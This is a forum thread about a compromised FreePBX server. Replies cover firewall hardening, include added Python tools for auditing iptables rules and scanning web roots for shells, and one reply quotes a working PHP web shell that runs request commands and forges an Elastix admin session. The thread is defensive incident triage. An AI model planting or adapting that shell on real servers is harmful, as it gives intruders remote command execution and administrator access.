FreePBX Server Hacked. Was firewalled but port 80 open to the world


(Lorne Gaetz) #52

Check if any extensions are set to forward:

[root@test]# asterisk -x "database show CF"
/CF/2005                                          : 90210
1 results found.

(Chris) #53

None found.

[root@office-VoIP-Sept-2019 pnetadmin]# asterisk -x "database show CF"
0 results found.


(HawkEye) #54

If you are using port 80 to manage your FreePBX, all data is sent in CLEAR TEXT. Everything you send including admin user and password are in clear text. You should ONLY be using port 443 to login and use the FreePBX GUI.

On top of that, you should ONLY allow the administrator(s) IP address(es) to access 80/443. Since I don’t know your setup, here is some food for thought.

At my office and at our data centre we have Mikrotik routers. From our office, we have an L2TP/IPsec VPN. On the remote FreePBX servers, iptables only allows connections from RFC1918 addresses (192.168.xxx.xxx, 172.16.xxx.xxx, etc.) to port 80, and connections to port 80 are then redirected to port 443. Also use htpasswd for protection, and do NOT use the same user/pass credentials for htpasswd as you have for the FreePBX GUI. When outside the office, we VPN to the office router and are then able to securely access the FreePBX GUI.

Failed sip logins are banned and the ban is sent to the Mikrotik router permanently. The bans can be deleted of course by the person controlling the Mikrotik router.

Since our office doesn't have a static IP address, we simply use IP/Cloud in Mikrotik to get a CNAME address, and that address is added to both the Mikrotik and our custom iptables firewall scripts.

In outbound routes, we only have those international countries we actually call.
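
The allow-list policy described in the post above, as an added example (this is not code from the thread, from FreePBX or from Mikrotik): a small Python audit that parses `iptables -S INPUT` output and reports every rule that ACCEPTs TCP 80 or 443 from a source outside RFC1918 or a named admin address, plus a helper that emits the matching hardened rules. The sample rule set, the admin address 203.0.113.10 (a documentation address) and all function names are assumptions made for the example. The example filters 80 and 443 identically and leaves the 80-to-443 redirect to the web server (an HTTP 301 on the port-80 vhost), since a raw port redirect in iptables would deliver plain HTTP to the TLS listener.

```python
"""Audit `iptables -S INPUT` output for FreePBX admin ports reachable from anywhere.

Added example; not from the FreePBX thread or tooling. Negated matches ('! -s ...')
are not modelled, so review hits by hand before trusting them.
"""
import ipaddress
import shlex
import sys

ADMIN_PORTS = {80, 443}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample of `iptables -S INPUT` output; 203.0.113.10 is a documentation
# address standing in for the admin's public IP. Not captured from a real host.
SAMPLE_RULES = """\
-P INPUT DROP
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -s 192.168.0.0/16 -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -s 203.0.113.10/32 -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p udp -m udp --dport 5060 -j ACCEPT
"""


def _ports(spec):
    """Expand an iptables port spec such as '443', '80,443' or '8000:8010' into a set."""
    out = set()
    for part in spec.split(","):
        lo, _, hi = part.partition(":")
        out.update(range(int(lo), int(hi or lo) + 1))
    return out


def parse_rule(line):
    """Parse one '-A INPUT ...' line into (source, proto, dports, target); None for other lines."""
    tokens = shlex.split(line)
    if len(tokens) < 2 or tokens[0] != "-A" or tokens[1] != "INPUT":
        return None
    src, proto, ports, target = None, None, set(), None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        arg = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok in ("-s", "--source"):
            src = ipaddress.ip_network(arg, strict=False)
        elif tok in ("-p", "--protocol"):
            proto = arg
        elif tok in ("--dport", "--dports"):
            ports |= _ports(arg)
        elif tok in ("-j", "--jump"):
            target = arg
        else:
            i += 1          # option we do not interpret (e.g. '-m tcp'): step one token
            continue
        i += 2
    return src, proto, ports, target


def source_is_allowed(src, admin_networks):
    """True if the rule's source sits inside RFC1918 or one of the admin networks."""
    if src is None:                      # no -s at all: the rule matches the whole Internet
        return False
    return any(net.version == src.version and src.subnet_of(net)
               for net in RFC1918 + list(admin_networks))


def world_open_admin_rules(rules_text, admin_networks=()):
    """Return the INPUT rules that ACCEPT tcp/80 or tcp/443 from outside the allowed ranges."""
    allowed = [ipaddress.ip_network(a, strict=False) for a in admin_networks]
    findings = []
    for line in rules_text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        src, proto, ports, target = parsed
        if target != "ACCEPT" or proto not in (None, "tcp") or not (ports & ADMIN_PORTS):
            continue
        if not source_is_allowed(src, allowed):
            findings.append(line)
    return findings


def hardened_rules(admin_networks):
    """Emit iptables commands allowing 80/443 only from RFC1918 and the admin addresses."""
    nets = RFC1918 + [ipaddress.ip_network(a, strict=False) for a in admin_networks]
    cmds = [f"iptables -A INPUT -s {net} -p tcp -m multiport --dports 80,443 -j ACCEPT"
            for net in nets]
    cmds.append("iptables -A INPUT -p tcp -m multiport --dports 80,443 -j DROP")
    return cmds


if __name__ == "__main__":
    # Usage: iptables -S INPUT | python3 audit_admin_ports.py 203.0.113.10 [more admin IPs]
    text = SAMPLE_RULES if sys.stdin.isatty() else sys.stdin.read()
    for rule in world_open_admin_rules(text, sys.argv[1:]):
        print("WORLD-REACHABLE:", rule)
```

On the constructed sample the audit flags the bare `--dport 80` rule (and the 203.0.113.10 rule too, unless that address is passed as an admin network). Feed it the real `iptables -S INPUT` on the box; for a dynamic admin address, resolve the DDNS name to an IP first and pass that, which is the same thing the firewall script has to do each time it reloads.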


(Mvogel4949) #55

I've had a few compromised systems in the past. In each instance I found files in /var/www/html that didn't belong. Usually there was one called phpversions.php. They would have something like the following (might we be looking at a PHP vulnerability?):

<form action="" method="post" ><input size=20 type=password name="p" /><input size=60 type=text name="c" /><input type=submit value="Hacked" /></form>
<?php
// Password gate: only someone who knows the preimage of this MD5 hash can use the shell.
if(md5($_REQUEST['p'])=='5e93f3072191e5add6c4bd9c1a89c807')
{
    // Run the attacker-supplied command as the web server user; '@' suppresses PHP warnings.
    @system($_REQUEST['c']);
    // Load the Elastix ACL classes and read the acl_user row with id 1 (name and password hash).
    include_once "/var/www/html/libs/paloSantoDB.class.php";
    include_once "/var/www/html/libs/paloSantoACL.class.php";
    $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
    $db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
    // Forge a logged-in Elastix session for that user so the attacker can use the normal GUI.
    session_name("elastixSession");
    session_start();
    $_SESSION['elastix_user'] = $db[0][0];
    $_SESSION['elastix_pass'] = $db[0][1];
    echo '<a href="/" >Emad__Was__Here</a>';
}
?>
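
As an added example (not from the thread, and not FreePBX or Elastix code), a triage scanner for the kind of drop-in shell quoted above: it walks a web root and flags PHP files where a request parameter flows straight into command execution or code evaluation, where `eval` wraps a decoded blob, where `preg_replace` uses the `/e` modifier, or where an MD5 password gate like the one above guards the call. The indicator list is an assumption and a starting point, not a complete signature set; the two sample files it writes to a temporary directory are constructed for illustration, and the name phpversions.php is reused only because the post mentions it.

```python
"""Triage scan of a web root for PHP web-shell indicators.

Added example; not from the FreePBX/Elastix thread. Pattern matching misses
obfuscated shells, so treat a clean result as "nothing obvious", not "clean".
"""
import os
import re
import sys
import tempfile

# Any request superglobal feeding a dangerous call is the core of a drop-in shell.
USER_INPUT = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
INDICATORS = [
    ("exec-from-request",
     re.compile(r"@?\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*" + USER_INPUT)),
    ("eval-from-request",
     re.compile(r"\b(?:eval|assert|create_function)\s*\(\s*" + USER_INPUT)),
    ("eval-decoded-blob",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("hashed-password-gate",
     re.compile(r"\bmd5\s*\(\s*" + USER_INPUT + r"\s*\[[^\]]+\]\s*\)\s*==")),
    ("preg-replace-e-modifier",
     re.compile(r"\bpreg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]")),
]
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")


def scan_file(path):
    """Return the indicator labels that fire on one file (empty list if none or unreadable)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    except OSError:
        return []
    return [label for label, rx in INDICATORS if rx.search(data)]


def scan_webroot(root):
    """Walk `root`; return {path relative to root: [labels]} for every PHP file that matched."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PHP_EXTENSIONS):
                full = os.path.join(dirpath, name)
                labels = scan_file(full)
                if labels:
                    hits[os.path.relpath(full, root)] = labels
    return hits


# Constructed sample files: a harmless page and a shell modelled on the snippet quoted
# above (placeholder hash, same structure). Not real files from a compromised host.
BENIGN_PHP = "<?php\n$v = phpversion();\necho htmlspecialchars($v);\n"
SHELL_PHP = (
    "<?php\n"
    "if(md5($_REQUEST['p'])=='00000000000000000000000000000000')\n"
    "{\n"
    "@system($_REQUEST['c']);\n"
    "}\n"
)


def build_sample_webroot():
    """Write the two sample files into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "admin"))
    with open(os.path.join(root, "admin", "index.php"), "w", encoding="utf-8") as fh:
        fh.write(BENIGN_PHP)
    with open(os.path.join(root, "phpversions.php"), "w", encoding="utf-8") as fh:
        fh.write(SHELL_PHP)
    return root


if __name__ == "__main__":
    # Usage: python3 shellscan.py /var/www/html   (no argument: scan the constructed sample)
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_webroot()
    for path, labels in sorted(scan_webroot(root).items()):
        print(f"{path}: {', '.join(labels)}")
```

On the constructed sample only phpversions.php is reported, with `exec-from-request` and `hashed-password-gate`. On a real box, cross-check every hit and every PHP file the package manager does not own (`rpm -V` on the relevant packages, or a diff against a clean install) and look at modification times around the hit, since a shell that is found is usually not the only file the intruder touched.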